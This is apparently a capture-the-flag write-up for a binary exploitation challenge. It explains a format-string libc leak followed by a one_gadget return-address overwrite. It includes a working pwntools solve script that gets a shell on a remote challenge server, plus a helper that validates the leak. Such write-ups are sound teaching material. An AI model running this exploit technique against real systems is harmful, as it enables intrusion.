# [EN] Exploit Me 1
###### tags: `Writeup` `Pwn` `English`
> [name=Curious]
## Train of Thought & Solution
First, load `chal` into IDA.

We can see that this challenge can be solved by using a format string (FMT) leak to obtain an address and then a One Gadget to get a shell. To do that, we first need to leak the libc address.
Next, let's take a look at the conditions for the One Gadget.

If you look closely at the assembly of `main`, you will notice `xor rsi, rsi` and `xor rdx, rdx` instructions at the end. The conditions for the One Gadget therefore boil down to requiring that `rbp - 0x78` be writable. Since we have already leaked the libc address, we can set `rbp` to an address in the writable segment of libc.
Solve script:
```python=
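from pwn import *

context.arch = 'amd64'
# r = process('./chal')
r = remote('lotuxctf.com', 10007)

# Format string leak: the 9th positional argument holds a libc address
r.sendlineafter(b'> ', b'%9$p')
libc = int(r.recvline().strip(), 16) - 0x029d90  # leaked pointer minus its offset = libc base
info(f'libc : {hex(libc)}')

one_gadget = libc + 0xebcf8
buf = libc + 0x21af00  # address in libc's writable segment, used as the new rbp

# 0x10 bytes of padding, then the new rbp and the return address
r.sendlineafter(b'> ', b'a' * 0x10 + flat(buf, one_gadget))
r.interactive()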
```
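The three offsets in the script only hold for one specific libc build, so it is worth validating the leak before deriving anything from it. The following is an added example, not part of the original solve script: the function names are hypothetical, the sample leak is constructed, and the user-space limit assumes 48-bit x86-64 addressing.

```python
# Added example: sanity-check a %p leak before computing libc addresses.
# Offsets are copied from the solve script above; names are hypothetical.
PAGE_MASK = 0xFFF                    # libc is mapped on a 4 KiB page boundary
USER_TOP = 0x0000_8000_0000_0000     # assumption: 48-bit x86-64 user space

LEAK_OFFSET = 0x029D90               # offset of the pointer leaked by %9$p
ONE_GADGET_OFFSET = 0xEBCF8
WRITABLE_OFFSET = 0x21AF00


def parse_pointer(raw: bytes) -> int:
    """Turn one line of %p output into an integer."""
    text = raw.strip().decode("ascii", errors="replace")
    if text == "(nil)":              # glibc prints NULL pointers like this
        raise ValueError("leaked slot is NULL")
    try:
        return int(text, 16)         # accepts the leading 0x
    except ValueError:
        raise ValueError(f"not a %p value: {text!r}") from None


def libc_base(raw: bytes, leak_offset: int = LEAK_OFFSET) -> int:
    """Return the libc base, or raise if the result cannot be a mapping base."""
    base = parse_pointer(raw) - leak_offset
    if not 0 < base < USER_TOP:
        raise ValueError(f"base {base:#x} is outside user space")
    if base & PAGE_MASK:
        # A non-zero low 12 bits means the offset does not match this libc.
        raise ValueError(f"base {base:#x} is not page aligned")
    return base


def derive(raw: bytes) -> dict:
    """Compute the same addresses as the solve script from a validated base."""
    base = libc_base(raw)
    return {
        "libc": base,
        "one_gadget": base + ONE_GADGET_OFFSET,
        "buf": base + WRITABLE_OFFSET,
    }


if __name__ == "__main__":
    sample = b"0x7f1234590d90\n"     # constructed leak, not real output
    for name, addr in derive(sample).items():
        print(f"{name:10s} {addr:#x}")
```

A misaligned base is the usual symptom of running against a libc other than the one the offsets were taken from.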